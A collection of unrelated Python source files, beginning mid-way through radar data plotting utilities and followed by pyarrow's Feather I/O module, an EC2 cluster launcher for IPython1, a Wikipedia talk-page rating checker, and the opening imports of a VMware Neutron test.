cbar2 = None
return(ploth,cbar2)
def sliceGDsphere(geod,coordnames ='cartesian' ,vbounds=None,time = 0,gkey = None,cmap=defmap,fig=None,ax=None,title='',cbar=True):
assert geod.coordnames.lower() =='spherical'
if coordnames.lower() in ['cartesian','enu','ecef']:
veckeys = ['x','y','z']
elif coordnames.lower() == 'wgs84':
veckeys = ['lat','long','alt']
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
#determine the data name
if gkey is None:
gkey = geod.data.keys[0]
title = insertinfo(title,gkey,geod.times[time,0],geod.times[time,1])
xycoords = geod.__changecoords__(coordnames)
xvec = xycoords[:,0]
yvec = xycoords[:,1]
curdata =geod.data[gkey][:,time]
ploth = ax.tripcolor(xvec,yvec,curdata)
if cbar:
cbar2 = plt.colorbar(ploth, ax=ax, format='%.0e')
else:
cbar2 = None
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
return(ploth,cbar2)
def plotbeamposfig(geod,height,coordnames,fig=None,ax=None,title=''):
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
(beams,beaminds,beamnums) = uniquerows(geod.dataloc[:,1:])
az = beams[:,0]
el = beams[:,1]
rho = height*np.tan(np.radians((90-el)))
y = rho*np.cos(np.radians(az))
x = rho*np.sin(np.radians(az))
ploth = ax.scatter(x,y)
return(ploth)
def rangevstime(geod,beam,vbounds=(None,None),gkey = None,cmap=defmap,fig=None,ax=None,
title='',cbar=True,tbounds=(None,None),ic=True,ir=True,it=True):
"""
This method will create a color graph of range vs time for data in spherical coordinates
Inputs
geod -
"""
assert geod.coordnames.lower() =='spherical', 'I expect speherical coordinate data'
if (ax is None) and (fig is None):
fig = plt.figure(figsize=(12,8))
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if gkey is None:
gkey = geod.data.keys[0]
#%% get unique ranges for plot limits, note beamid is not part of class.
match = np.isclose(geod.dataloc[:,1:],beam,atol=1e-2).all(axis=1) #TODO what should tolerance be for Sondrestrom mechanical dish
if (~match).all(): #couldn't find this beam
logging.error('beam az,el {} not found'.format(beam))
return
if not title:
title = gkey
dataout = geod.data[gkey][match]
rngval = geod.dataloc[match,0]
t = np.asarray(list(map(dt.datetime.utcfromtimestamp, geod.times[:,0])))
#%% time limits of display
ploth = ax.pcolormesh(t,rngval,dataout,
vmin=vbounds[0], vmax=vbounds[1],cmap = cmap)
if cbar:
fig.colorbar(ploth, ax=ax, format=sfmt)
if it:
ax.set_title(title)
if ic:
ax.set_ylabel('az,el = {} \n slant range [km]'.format(beam))
if ir:
ax.set_xlabel('UTC')
ttxt = tbounds[0].strftime('%Y-%m-%d') if tbounds[0] else t[0].strftime('%Y-%m-%d')
fig.suptitle(ttxt,fontsize='xx-large')
ax.autoscale(axis='y',tight=True) #fills axis
ax.xaxis.set_major_formatter(DateFormatter('%H:%M'))
ax.set_xlim(tbounds)
fig.autofmt_xdate()
return ploth
def rangevsparam(geod,beam,time_sel,gkey = None,gkeyerr=None,fig=None,ax=None,
title='',ic=True,ir=True,it=True,label=None):
assert geod.coordnames.lower() =='spherical', 'I expect speherical coordinate data'
if (ax is None) and (fig is None):
fig = plt.figure(figsize=(12,8))
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if gkey is None:
gkey = geod.data.keys[0]
#%% get unique ranges for plot limits, note beamid is not part of class.
match = np.isclose(geod.dataloc[:,1:],beam,atol=1e-2).all(axis=1) #TODO what should tolerance be for Sondrestrom mechanical dish
if (~match).all(): #couldn't find this beam
logging.error('beam az,el {} not found'.format(beam))
return
if not title:
title = gkey
dataout = geod.data[gkey][match]
rngval = geod.dataloc[match,0]
#t = np.asarray(list(map(dt.datetime.utcfromtimestamp, geod.times[:,0])))
ploth = ax.plot(dataout[:,time_sel],rngval,label=label)[0]
handlist = [ploth]
if not gkeyerr is None:
dataouterr = geod.data[gkeyerr][match]
plotherr = ax.errorbar(dataout[:,time_sel],rngval,xerr=dataouterr[:,time_sel],fmt='-o',color=ploth.get_color())
handlist.append(plotherr)
if it:
ax.set_title(title)
if ic:
ax.set_ylabel('az,el = {} \n slant range [km]'.format(beam))
if ir:
ax.set_xlabel(gkey)
ax.autoscale(axis='y',tight=True) #fills axis
return handlist
def uniquerows(a):
b=np.ascontiguousarray(a).view(np.dtype((np.void, a.dtype.itemsize * a.shape[1])))
(rowsinds,rownums) = np.unique(b,return_index=True, return_inverse=True)[1:]
rows = a[rowsinds]
return (rows,rowsinds,rownums)
def plotbeamposGD(geod,title='Beam Positions',minel=30,elstep=10,fig=None,ax=None):
assert geod.coordnames.lower() =='spherical'
(azvec,elvec) = (geod.dataloc[:,1],geod.dataloc[:,2])
polarplot(azvec,elvec,markerarea=70,title=title,minel=minel,elstep=elstep,fig=fig,ax=ax)
def make_polax(zenith):
""" OBSOLETE
This makes the polar axes for the beams"""
if zenith:
minel = 0.0
maxel = 70.0
elspace = 10.0
ellines = np.arange(minel,maxel,elspace)
else:
minel = 30.0
maxel = 90.0
elspace = 10.0
ellines = np.arange(minel,maxel,elspace)
azlines = np.arange(0.0,360.0,30.0)
# plot all of the azlines
elvec = np.linspace(maxel,minel,100)
for iaz in azlines:
azvec = iaz*np.ones_like(elvec)
(xx,yy) = angles2xy(azvec,elvec,zenith)
plt.plot(xx,yy,'k--')
plt.hold(True)
(xt,yt) = angles2xy(azvec[-1],elvec[-1]-5,zenith)
plt.text(xt,yt,str(int(iaz)))
azvec = np.linspace(0.0,360,100)
# plot the el lines
for iel in ellines:
elvec = iel*np.ones_like(azvec)
(xx,yy) = angles2xy(azvec,elvec,zenith)
plt.plot(xx,yy,'k--')
(xt,yt) = angles2xy(315,elvec[-1]-3,zenith)
plt.text(xt,yt,str(int(iel)))
plt.axis([-90,90,-90,90])
frame1 = plt.gca()
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
def polarplot(az,el,markerarea=400,title=None,minel=30.,elstep=10.,fig=None,ax=None):
"""
plots hollow circles at az,el coordinates, with area quantitatively defined
Michael Hirsch from satkml
"""
az = np.radians(np.asarray(az).astype(float))
el = 90. - np.asarray(el).astype(float)
if fig is None:
fig = plt.figure()
if ax is None:
ax=fig.gca(polar=True)
ax.set_theta_zero_location('N')
# ax.set_rmax(90-minel)
ax.set_theta_direction(-1)
ax.scatter(x=az, y=el, marker='o',facecolors='none',
edgecolor='red',s=markerarea, linewidths=2)
yt = np.arange(0., 90.-minel+elstep, elstep)
ax.set_yticks(yt)
ylabel = (yt[::-1]+minel).astype(int).astype(str)
ax.set_yticklabels(ylabel)
ax.set_title(title,y=1.08)
return fig
#%%
#quiver() creates quiver plots with contours from GeoData objects
#arrowscale is the scale of the quiver plot vector arrows
def quiverGD(geod,axstr,slicenum,arrowscale,vbounds=None,time = 0,gkey = None,cmap='jet', fig=None,ax=None,title='',cbar=True,m=None):
poscoords = ['cartesian','wgs84','enu','ecef']
assert geod.coordnames.lower() in poscoords
if geod.coordnames.lower() in ['cartesian','enu','ecef']:
axdict = {'x':0,'y':1,'z':2}
veckeys = ['x','y','z']
elif geod.coordnames.lower() == 'wgs84':
axdict = {'lat':0,'long':1,'alt':2}# shows which row is this coordinate
veckeys = ['long','lat','alt']# shows which is the x, y and z axes for plotting
if type(axstr)==str:
axis=axstr
else:
axis= veckeys[axstr]
veckeys.remove(axis.lower())
veckeys.append(axis.lower())
datacoords = geod.dataloc
xyzvecs = {l:sp.unique(datacoords[:,axdict[l]]) for l in veckeys}
#make matrices
M1,M2 = sp.meshgrid(xyzvecs[veckeys[0]],xyzvecs[veckeys[1]])
slicevec = sp.unique(datacoords[:,axdict[axis]])
min_idx = sp.argmin(sp.absolute(slicevec-slicenum))
slicenum=slicevec[min_idx]
rec_coords = {axdict[veckeys[0]]:M1.flatten(),axdict[veckeys[1]]:M2.flatten(),
axdict[axis]:slicenum*sp.ones(M2.size)}
new_coords = sp.zeros((M1.size,3))
#make coordinates
for ckey in rec_coords.keys():
new_coords[:,ckey] = rec_coords[ckey]
#determine the data name
if gkey is None:
gkey = geod.data.keys()[0]
# get the data location, first check if the data can be just reshaped then do a
# search
sliceindx = slicenum==datacoords[:,axdict[axis]]
datacoordred = datacoords[sliceindx]
rstypes = ['C','F','A']
nfounds = True
M1dlfl = datacoordred[:,axdict[veckeys[0]]]
M2dlfl = datacoordred[:,axdict[veckeys[1]]]
for ir in rstypes:
M1dl = sp.reshape(M1dlfl,M1.shape,order =ir)
M2dl = sp.reshape(M2dlfl,M1.shape,order =ir)
if sp.logical_and(sp.allclose(M1dl,M1),sp.allclose(M2dl,M2)):
nfounds=False
break
if nfounds:
dx = geod.datareducelocation(new_coords,geod.coordnames,gkey[0])[:,time]
dy = geod.datareducelocation(new_coords,geod.coordnames,gkey[1])[:,time]
dx = sp.reshape(dx,M1.shape)
dy = sp.reshape(dy,M1.shape)
else:
dx = sp.reshape(geod.data[gkey[0]][sliceindx,time],M1.shape,order=ir)
dy = sp.reshape(geod.data[gkey[1]][sliceindx,time],M1.shape,order=ir)
title = insertinfo(title,gkey[0],geod.times[time,0],geod.times[time,1])
if (ax is None) and (fig is None):
fig = plt.figure(facecolor='white')
ax = fig.gca()
elif ax is None:
ax = fig.gca()
if m is None:
quiv = ax.quiver(M1,M2,dx,dy,scale=arrowscale)
ax.axis([xyzvecs[veckeys[0]].min(), xyzvecs[veckeys[0]].max(),
xyzvecs[veckeys[1]].min(), xyzvecs[veckeys[1]].max()])
ax.set_title(title)
ax.set_xlabel(veckeys[0])
ax.set_ylabel(veckeys[1])
else:
N1,N2 = m(M1,M2)
quiv = ax.quiver(M1,M2,dx,dy,scale=arrowscale)
return(quiv)
def insertinfo(strin,key='',posix=None,posixend = None):
listin = isinstance(strin,list)
if listin:
stroutall = []
else:
strin=[strin]
for k in range(len(strin)):
strout = strin[k].replace('$k',key)
if posix is None:
strout=strout.strip('$tu')
strout=strout.strip('$tdu')
else:
curdt = time.gmtime(posix);
curdte = time.gmtime(posixend);
markers = [
'$thmsehms',#UT hours minutes seconds - hours minutes seconds
'$thmehm',#UT hours minutes - hours minutes
'$tmsems',#UT minutes seconds - minutes seconds
'$thms',#UT hours minutes seconds
'$thm',#UT hours minutes
'$tms',#UT minutes seconds
'$tmdyhms',#UT month/day/year hours minutes seconds
'$tmdyhm',#UT month/day/year hours minutes
'$tmdy',#UT month/day/year
'$tmdhm'#UT month/day hours minutes
]
datestrcell = [
time.strftime('%H:%M:%S',curdt)+' - '+time.strftime('%H:%M:%S',curdte)+' UT',
time.strftime('%H:%M',curdt)+' - '+time.strftime('%H:%M',curdte)+' UT',
time.strftime('%M:%S',curdt)+' - '+time.strftime('%M:%S',curdte)+' UT',
time.strftime('%H:%M:%S',curdt)+' UT',
time.strftime('%H:%M',curdt)+' UT',
time.strftime('%M:%S',curdt)+' UT',
time.strftime('%m/%d/%Y %H:%M:%S',curdt)+' UT',
time.strftime('%m/%d/%Y %H:%M',curdt)+' UT',
time.strftime('%m/%d/%Y',curdt),
time.strftime('%m/%d %H:%M',curdt)+' UT']
for imark in range(len(markers)):
strout=strout.replace(markers[imark],datestrcell[imark]);
if listin:
stroutall[k] = strout
else:
stroutall = strout
return stroutall
def plotazelscale(opt,az=None,el=None):
"""
diagnostic: plots az/el map over test image
Michael Hirsch
"""
if isinstance(opt,GeoData):
img = opt.data['optical'][0,...]
az = opt.dataloc[:,1].reshape(img.shape)
el = opt.dataloc[:,2].reshape(img.shape)
elif isinstance(opt,np.ndarray):
img = opt
else:
raise NotImplementedError('not sure what your opt array {} is'.format(type(opt)))
assert img.ndim==2, 'just one image please'
assert img.shape==az.shape==el.shape,'do you need to reshape your az/el into 2-D like image?'
fg,ax = plt.subplots(1,2,figsize=(12,6))
for a,q,t in zip(ax,(az,el),('azimuth','elevation')):
a.imshow(img,origin='lower',interpolation='none',cmap='gray')
c=a.contour(q)
a.clabel(c, inline=1,fmt='%0.1f')
a.set_title(t)
a.grid(False)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import six
from pyarrow.pandas_compat import _pandas_api # noqa
from pyarrow.lib import FeatherError # noqa
from pyarrow.lib import Table, concat_tables
import pyarrow.lib as ext
def _check_pandas_version():
if _pandas_api.loose_version < '0.17.0':
raise ImportError("feather requires pandas >= 0.17.0")
class FeatherReader(ext.FeatherReader):
def __init__(self, source):
_check_pandas_version()
self.source = source
self.open(source)
def read_table(self, columns=None):
if columns is None:
return self._read()
column_types = [type(column) for column in columns]
if all(map(lambda t: t == int, column_types)):
return self._read_indices(columns)
elif all(map(lambda t: t == str, column_types)):
return self._read_names(columns)
column_type_names = [t.__name__ for t in column_types]
raise TypeError("Columns must be indices or names. "
"Got columns {} of types {}"
.format(columns, column_type_names))
def read_pandas(self, columns=None, use_threads=True):
return self.read_table(columns=columns).to_pandas(
use_threads=use_threads)
def check_chunked_overflow(col):
if col.data.num_chunks == 1:
return
if col.type in (ext.binary(), ext.string()):
raise ValueError("Column '{0}' exceeds 2GB maximum capacity of "
"a Feather binary column. This restriction may be "
"lifted in the future".format(col.name))
else:
# TODO(wesm): Not sure when else this might be reached
raise ValueError("Column '{0}' of type {1} was chunked on conversion "
"to Arrow and cannot be currently written to "
"Feather format".format(col.name, str(col.type)))
class FeatherWriter(object):
def __init__(self, dest):
_check_pandas_version()
self.dest = dest
self.writer = ext.FeatherWriter()
self.writer.open(dest)
def write(self, df):
if isinstance(df, _pandas_api.pd.SparseDataFrame):
df = df.to_dense()
if not df.columns.is_unique:
raise ValueError("cannot serialize duplicate column names")
# TODO(wesm): Remove this length check, see ARROW-1732
if len(df.columns) > 0:
table = Table.from_pandas(df, preserve_index=False)
for i, name in enumerate(table.schema.names):
col = table[i]
check_chunked_overflow(col)
self.writer.write_array(name, col.data.chunk(0))
self.writer.close()
class FeatherDataset(object):
"""
Encapsulates details of reading a list of Feather files.
Parameters
----------
path_or_paths : List[str]
A list of file names
validate_schema : boolean, default True
Check that individual file schemas are all the same / compatible
"""
def __init__(self, path_or_paths, validate_schema=True):
_check_pandas_version()
self.paths = path_or_paths
self.validate_schema = validate_schema
def read_table(self, columns=None):
"""
Read multiple feather files as a single pyarrow.Table
Parameters
----------
columns : List[str]
Names of columns to read from the file
Returns
-------
pyarrow.Table
Content of the file as a table (of columns)
"""
_fil = FeatherReader(self.paths[0]).read_table(columns=columns)
self._tables = [_fil]
self.schema = _fil.schema
for fil in self.paths[1:]:
fil_table = FeatherReader(fil).read_table(columns=columns)
if self.validate_schema:
self.validate_schemas(fil, fil_table)
self._tables.append(fil_table)
return concat_tables(self._tables)
def validate_schemas(self, piece, table):
if not self.schema.equals(table.schema):
raise ValueError('Schema in {0!s} was different. \n'
'{1!s}\n\nvs\n\n{2!s}'
.format(piece, self.schema,
table.schema))
def read_pandas(self, columns=None, use_threads=True):
"""
Read multiple Parquet files as a single pandas DataFrame
Parameters
----------
columns : List[str]
Names of columns to read from the file
use_threads : boolean, default True
Use multiple threads when converting to pandas
Returns
-------
pandas.DataFrame
Content of the file as a pandas DataFrame (of columns)
"""
return self.read_table(columns=columns).to_pandas(
use_threads=use_threads)
def write_feather(df, dest):
"""
Write a pandas.DataFrame to Feather format
Parameters
----------
df : pandas.DataFrame
dest : string
Local file path
"""
writer = FeatherWriter(dest)
try:
writer.write(df)
except Exception:
# Try to make sure the resource is closed
import gc
writer = None
gc.collect()
if isinstance(dest, six.string_types):
try:
os.remove(dest)
except os.error:
pass
raise
def read_feather(source, columns=None, use_threads=True):
"""
Read a pandas.DataFrame from Feather format
Parameters
----------
source : string file path, or file-like object
columns : sequence, optional
Only read a specific set of columns. If not provided, all columns are
read
use_threads: bool, default True
Whether to parallelize reading using multiple threads
Returns
-------
df : pandas.DataFrame
"""
reader = FeatherReader(source)
return reader.read_pandas(columns=columns, use_threads=use_threads)
def read_table(source, columns=None):
"""
Read a pyarrow.Table from Feather format
Parameters
----------
source : string file path, or file-like object
columns : sequence, optional
Only read a specific set of columns. If not provided, all columns are
read
Returns
-------
table : pyarrow.Table
"""
reader = FeatherReader(source)
return reader.read_table(columns=columns)
|
|
import sys, os, time
import ConfigParser
from itertools import groupby
import ipython1.kernel.api as kernel
import boto
# options required in the config file
required_config_options = [
('access_key', 'Please specify your AWS access key ID.'),
('secret_access_key', 'Please specify your AWS secret access key.'),
('ami', 'Please specify the AMI to use for the controller and engines.'),
('key_name', 'Please specify the key_name to use with the EC2 instances.'),
('credential', 'Please specify the ssh credential file.'),
]
class EC2Cluster:
"""
* starts desired number of EC2 instances
* starts controller on first instance
* starts engines on all other instances
* includes methods for:
* creating and terminating cluster
* creating RemoteController and TaskController from cluster
states:
* aws_connected: have connection to AWS
* instances_reserved
* instances_running
* cluster_ready: instances are running and IPython1 controller/engines setup
"""
def __init__(self, configfile, instances=[]):
self.config = self._check_config(configfile)
self.conn = boto.connect_ec2(
self.config['access_key'],
self.config['secret_access_key']
)
self._state = ['aws_connected']
self.instances = instances if instances else []
def _check_config(self, configfile):
configp = ConfigParser.SafeConfigParser()
configp.read(configfile)
config = dict(configp.items('EC2'))
for key, error in required_config_options:
if key not in config:
print error
sys.exit(1)
return config
def _wait_till_instances_in_state(self, waitingfor, resulting_state, sleepfor=10):
print "Waiting till all instances are %s. Will check every %s seconds." % (waitingfor, sleepfor)
print "Hit Ctrl-C to stop waiting."
while True:
statuses = [i.update() for i in self.instances]
if all(status == waitingfor for status in statuses):
print "All instances %s" % waitingfor
self._state.append(resulting_state)
return
else:
print "Not all instances are %s" % waitingfor
statuses.sort()
for statustype, statuses in groupby(statuses, lambda x: x):
print "\t%s: %s instances" % (statustype, len(list(statuses)))
time.sleep(sleepfor)
def wait_till_instances_running(self, sleepfor=10):
self._wait_till_instances_in_state('running', 'instances_running', sleepfor)
def wait_till_instances_terminated(self, sleepfor=10):
self._wait_till_instances_in_state('terminated', 'instances_terminated', sleepfor)
def create_instances(self, min_count=1, max_count=None):
# if max not specified, it's the same as the min
max_count = max_count or min_count
# reserve instances
print "Reserving EC2 instances."
self.reservation = self.conn.run_instances(
self.config['ami'],
min_count, max_count,
self.config['key_name'],
)
self._state.append('instances_reserved')
self.instances = self.reservation.instances
self.wait_till_instances_running()
print "Waiting for firewall ports to open up (10 secs)"
time.sleep(10)
print "Trying to connect to worker nodes using ssh"
self._check_ssh_connection()
def _check_ssh_connection(self):
instances = [i for i in self.instances]
while instances:
for i in instances:
time.sleep(1) # so we're not bombarding the servers
if 0 == self.remote(i, "ls /"):
instances.remove(i)
def start_ipython1(self, engine_on_controller=False):
if not 'instances_running' in self._state:
print "Not all instances are running."
return False
if not hasattr(self, 'instances'):
print "Create EC2 instances before starting cluster."
return False
print "Starting ipython1 controller/engines on running instances"
# redirect stdin, stdout and stderr on remote processes so ssh terminates.
# we could use 'ssh -f' but that will fork ssh in the background
# and on large clusters that could mean many ssh background procs
cmd_postfix = "</dev/null >&0 2>&0 &"
# run ipcontroller on the first controller instance
controller_ip = self.instances[0].public_dns_name
controller_port = kernel.defaultRemoteController[1]
print "Starting controller on %s" % controller_ip
self.remote(
host = self.instances[0],
cmd = "nohup /usr/local/bin/ipcontroller -l /mnt/ipcontroller_ %s" % cmd_postfix,
)
print "Waiting for controller to start (6 secs)"
time.sleep(6)
# run engine on the same instance as controller?
engine_instances = self.instances[1:] if not engine_on_controller else self.instances
# run ipengine on selected instances
for inst in engine_instances:
print "Starting engine on %s" % inst.public_dns_name
self.remote(
host = inst,
cmd = "nohup /usr/local/bin/ipengine --controller-ip=%s -l /mnt/ipengine_ %s" % (controller_ip, cmd_postfix),
)
time.sleep(1) # so we don't bombard the controller..
print "-"*70
print "Ipython1 controller running on %s:%s" % (controller_ip, controller_port)
print "Type the following to login to controller:"
print "ssh -i %s root@%s" % (self.config['credential'], controller_ip)
self._state.append('ipython1_running')
time.sleep(6) # waiting for cluster to be setup
return True
def reboot_instances(self):
print "Rebooting all instances"
for inst in self.instances:
inst.reboot()
self._state = ['instances_reserved']
self.wait_till_instances_running()
def terminate_instances(self):
for i in self.instances:
i.stop()
self.wait_till_instances_terminated()
def authorize_access_to_controller(self, from_ip):
ports = [kernel.defaultRemoteController[1], kernel.defaultTaskController[1]]
for port in ports:
print "Authorizing access for group default for port %s from IP %s" % (port, from_ip)
self.conn.authorize_security_group('default', ip_protocol='tcp', from_port=port,
to_port=port, cidr_ip=from_ip)
@property
def remote_controller(self):
return kernel.RemoteController((
self.instances[0].public_dns_name,
kernel.defaultRemoteController[1]
))
@property
def task_controller(self):
return kernel.TaskController((
self.instances[0].public_dns_name,
kernel.defaultTaskController[1]
))
@property
def task_controller_url(self):
return "%s:%s" % (self.instances[0].public_dns_name,
kernel.defaultTaskController[1])
@property
def remote_controller_url(self):
return "%s:%s" % (self.instances[0].public_dns_name,
kernel.defaultRemoteController[1])
# from Peter Skomoroch's ec2-mpi-config.py (see http://datawrangling.com)
def remote(self, host, cmd='scp', src=None, dest=None, test=False):
""" Run a command on remote machine (or copy files) using ssh.
@param host: boto ec2 instance, ip address or dns name
"""
d = {
'cmd':cmd,
'src':src,
'dest':dest,
'host':getattr(host, 'public_dns_name', str(host)),
'switches': ''
}
d['switches'] += " -i %s " % self.config['credential']
if cmd == 'scp':
template = '%(cmd)s %(switches)s -o "StrictHostKeyChecking no" %(src)s root@%(host)s:%(dest)s'
else:
template = 'ssh %(switches)s -o "StrictHostKeyChecking no" root@%(host)s "%(cmd)s" '
cmdline = template % d
print "Trying: ", cmdline
if not test:
return os.system(cmdline)
def remote_all(self, cmd='scp', src=None, dest=None, test=False):
for i in self.instances:
self.remote(i.public_dns_name, cmd, src, dest, test)
def tofile(self, filename):
f = file(filename, 'w')
f.writelines(inst.id + "\n" for inst in self.instances)
f.close()
def fromfile(self, filename):
def _instance(id):
inst = boto.ec2.instance.Instance(self.conn)
inst.id = id
inst.update()
return inst
self.instances = [_instance(id[:-1]) for id in file(filename).readlines()]
# USAGE
#ec2 = EC2Cluster()
#ec2.create_instances()
#ec2.start_ipython1()
#tc = ec2.task_controller
#ec2.terminate_instances()
|
|
#!/usr/env/python
# -*- coding: utf-8 -*-
'''
Script that processes a dataset of rated articles and checks each article's
talk page in order to verify how many templates with importance ratings are
on their talk pages.
Copyright (c) 2017 Morten Wang
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import os
import re
import logging
import MySQLdb
import pywikibot
from pywikibot.pagegenerators import PreloadingGenerator, PagesFromTitlesGenerator
import mwparserfromhell as mwp
class TalkPage:
def __init__(self, page_id):
self.page_id = page_id
self.page_title = ''
self.num_ratings = 0
class TalkpageProcessor:
def __init__(self):
## Language code of the Wikipedia edition we're processing for
self.lang = 'en'
## Do 10 at a time in case the talk page is huge
self.slice_size = 10
self.db_conf = "~/replica.my.cnf"
self.db_server = "enwiki.labsdb"
self.db_name = "enwiki_p"
self.db_conn = None
self.db_cursor = None
## Names of templates with a "priority" parameter.
self.priority_templates = []
def db_connect(self):
'''
Connect to the database. Returns True if successful.
'''
self.db_conn = None
self.db_cursor = None
try:
self.db_conn = MySQLdb.connect(db=self.db_name,
host=self.db_server,
read_default_file=os.path.expanduser(self.db_conf))
self.db_cursor = self.db_conn.cursor(MySQLdb.cursors.SSDictCursor)
except MySQLdb.Error as e:
logging.error('Unable to connect to database')
logging.error('{} : {}'.format(e[0], e[1]))
if self.db_conn:
return(True)
return(False)
def db_disconnect(self):
'''Close our database connections.'''
try:
self.db_cursor.close()
self.db_conn.close()
except:
pass
return()
def process_template(self, template):
'''
Process the template and return a list of any valid ratings
found in it.
'''
## Valid importance ratings
VALID_RATINGS = set(['top','high','mid','low'])
## There are several cases where an importance rating might be found:
##
## 1: parameter named importance
## 2: sub-project importance parameters (e.g. WikiProject Africa
## uses a "Djibouti-importance" parameter)
## 3: sub-project priority parameters (e.g. WikiProject Biography
## uses a "filmbio-priority" parameter)
##
## Note that some WikiProjects use a "priority" parameter. We will
## ignore that parameter as we have yet to see an example where it
## results in a subsequent categorization of the article. As we're
## interested in knowing about them, we'll store the template names
## and write them out at the end.
ratings = []
if template.has('priority'):
self.priority_templates.append(str(template.name.strip_code()))
elif template.has('importance'):
rating = str(template.get('importance').value.strip_code()).strip().lower()
if rating in VALID_RATINGS:
ratings.append(rating)
for param in template.params:
p_name = str(param.name.strip_code()).strip().lower()
## This regex is deliberately liberal because some projects
## use things like "&" in the parameter name.
if re.search('.+-(priority|importance)$', p_name):
rating = str(param.value.strip_code()).strip().lower()
if rating in VALID_RATINGS:
ratings.append(rating)
return(ratings)
def check_talkpages(self, input_filename, output_filename,
id_col_idx):
'''
Go through all the pages in the given dataset of unanimously rated
articles and check their talk pages in order to establish the number
of actual importance ratings they have.
:param input_filename: path to the TSV dataset
:type input_filename: str
:param output_filename: path to output TSV dataset
:type output_filename: str
:param id_col_idx: zero-based index of the page ID column
:type id_col_idx: int
'''
## SQL query to get page titles based on page IDs
title_query = '''SELECT page_id, page_title
FROM page
WHERE page_id IN ({idlist})'''
site = pywikibot.Site(self.lang)
## Mapping page IDs and titles to talk page data
id_page_map = {}
title_page_map = {}
## read in the dataset
with open(input_filename, 'r', encoding='utf-8') as infile:
infile.readline() # skip header
for line in infile:
cols = line.rstrip('\n').split('\t')
page_id = cols[id_col_idx]
id_page_map[page_id] = TalkPage(page_id)
## find the current page title of all the pages
## (ideally none of them should have incorrect page IDs)
if not self.db_connect():
logging.error('unable to connect to database')
return()
pageids = list(id_page_map.keys())
i = 0
while i < len(pageids):
subset = pageids[i:i+self.slice_size]
self.db_cursor.execute(title_query.format(
idlist=','.join(subset)))
for row in self.db_cursor.fetchall():
page_id = str(row['page_id'])
page_title = row['page_title'].decode('utf-8').replace('_', ' ')
id_page_map[page_id].page_title = page_title
title_page_map[page_title] = id_page_map[page_id]
# ok, iterate
i += self.slice_size
self.db_disconnect()
talkpage_titles = ["Talk:{}".format(title)
for title in title_page_map.keys()]
for talkpage in PreloadingGenerator(
PagesFromTitlesGenerator(talkpage_titles),
step=self.slice_size):
logging.info('processing {}'.format(talkpage.title()))
## The templates are at the top of the page, so if it's a long
## page, truncate to speed up parsing.
try:
content = talkpage.get()
except pywikibot.exceptions.IsRedirectPage as e:
logging.warning('{} is a redirect'.format(talkpage.title()))
continue
if len(content) > 8*1024:
content = content[:8*1024]
parsed_page = mwp.parse(content)
for template in parsed_page.filter_templates(recursive=True):
ratings = self.process_template(template)
## Sanity check
if len({k:1 for k in ratings}) > 1:
logging.warning('{} has non-unanimous importance ratings'.format(talkpage.title()))
else:
title_page_map[talkpage.title(withNamespace=False)].num_ratings += len(ratings)
## Write out all pages with priority templates, if any
if self.priority_templates:
print('We found the following templates with a "priority" parameter')
for template in self.priority_templates:
print('* {}'.format(template))
print('')
## Write out a dataset of page ID and num ratings
with open(output_filename, 'w', encoding='utf-8') as outfile:
outfile.write('talk_page_id\ttalk_page_title\tnum_wpratings\n')
for (page_id, page_data) in id_page_map.items():
outfile.write('{0.page_id}\t{0.page_title}\t{0.num_ratings}\n'.format(page_data))
## ok, done
return()
def main():
import argparse
cli_parser = argparse.ArgumentParser(
description="script to check talk pages for importance ratings"
)
cli_parser.add_argument("input_filename", type=str,
help="path to the input TSV dataset")
cli_parser.add_argument("output_filename", type=str,
help="path to the output TSV extended dataset")
cli_parser.add_argument("id_col_idx", type=int,
help="zero-based index of the page ID column")
# Verbosity option
cli_parser.add_argument('-v', '--verbose', action='store_true',
help='write informational output')
args = cli_parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
processor = TalkpageProcessor()
processor.check_talkpages(args.input_filename, args.output_filename,
args.id_col_idx)
return()
if __name__ == '__main__':
main()
|
|
# Copyright 2013 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
from neutron.common import exceptions
from neutron.plugins.vmware.api_client import exception as api_exc
from neutron.plugins.vmware.common import exceptions as nsx_exc
from neutron.plugins.vmware.common import utils
